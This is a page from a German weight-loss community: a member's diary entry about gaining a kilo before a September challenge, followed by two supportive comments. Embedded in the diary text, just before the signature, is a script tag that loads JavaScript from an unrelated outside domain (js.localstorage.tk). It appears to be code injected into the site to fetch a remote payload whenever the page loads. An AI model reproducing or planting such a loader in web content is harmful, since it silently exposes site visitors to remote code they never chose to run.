Zum Inhalt springen

Sie sind hier

Ich gratuliere zum Ergebnis

0  0
Am von im Ernährungstagebuch geschrieben

Ach menno ich bin echt nen Dummi, natürlich habe ich nach einer Woche undiszipliniertem Essen ein Kilo drauf , aber ich wunder mich nicht denn ich weis sja wo es her kommt .

Gut nun fange ich also die Septemberchallange mit nem Kilo mehr an und hoffe das es ab jetzt nur noch bergab geht...ähem hatte ich erwähnt das ich bald gefährlichen Urlaub hab Wink

Nein ich muss mich mehr beherrschen, obwohl nichtmal das , einfach sorgsamer kochen... Werde ich auch wieder machen , es geht wieter der Dezamber lauert schliesslich mit Erfolge Smile

 

 

Trotzdem nervt es so haltlos zu sein ...grummel....

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

*** Das Leben ist zu kurz um aufzugeben ***

Vorheriger Ernährungstagebuch-Eintrag
Bild von Tag 26 - Freitag
Nächster Ernährungstagebuch-Eintrag
Bild von aideen Woche 6 - Stressige Woche und WE im Bett

Kommentare

Bild des Benutzers DerHutmacher
0  0

Lass' den Kopf nicht hängen! Smile Mein Wiege-Ergebnis diese Woche war der blanke Mist. Okay, auch ich weiß, wo es herkommt. Aber enttäuscht ist man natürlich trotzdem. Wir starten im September richtig durch. Smile Bis Weihnachten sind wir so schlank, das können wir jetzt gerade noch nicht fassen. Wink

Schönen Sonntag dir! Smile
Der Hutmacher

Bild des Benutzers laughy
0  0

Hahaha und schon muss ich lächeln ,ja der September wird sich wundern Wink

*** Das Leben ist zu kurz um aufzugeben ***

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Eintrag in ein Ernährungstagebuch von Ramona60: nach dem Aufstehen Kaffee mit Milch   Frühstück im Büro: glutenfreie Haferflocken ca 40 g, Flohsamen 10 g, Cornflakes ohne Zucker ca 10 g, mit 150 ml lauwarmer Milch 1,5 % aufgegeossen und 125...
Eintrag in ein Ernährungstagebuch von kortes: ...minus 1,8 Kg. Da war ich heute morgen echt platt. Gut ich habe es schon im Laufe der Woche gemerkt, dass da richtig was geht. Meine neuen Hosen wurden mir weit, die Blusen schlabbern und ich bin...
Eintrag in ein Ernährungstagebuch von TrEmLi: Ich habe mir ja fest vorgenommen, hier wieder aktiver zu sein und regelmäßig Tagebuch-Einträge zu schreiben. Also auf geht's! Zu den letzten 33 Tagen, die ich hier nichts geschrieben habe: Ich habe...
Eintrag in ein Ernährungstagebuch von HanniSunny: Heute morgen hätte ich am liebsten geweint mich krankgemeldet und mich daheim im Bett verkrochen. Heute ist ja ein mega warmer Tag und ich hab absolut nichts zum anziehen. Meine ganzen Klamotten vom...
Eintrag in ein Ernährungstagebuch von kortes: ...heute morgen war es soweit. Wiegen und zugenommen. Das will man echt nicht sehen, aber ich habe schon damit gerechnet. Am Donnerstag hatte ich frei und obwohl es mir nicht an Beschäftigung...
Motivation von Diecoolejule: Bald stehen wieder die ganzen Sommerparties an. Immer muss ich weite Klamotten suchen, die noch passen. Ich will das aber nicht mehr! Ich möchte in alles wieder passen und mich bei meinen Röcken und...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst

Neue Abnehmen-Tipps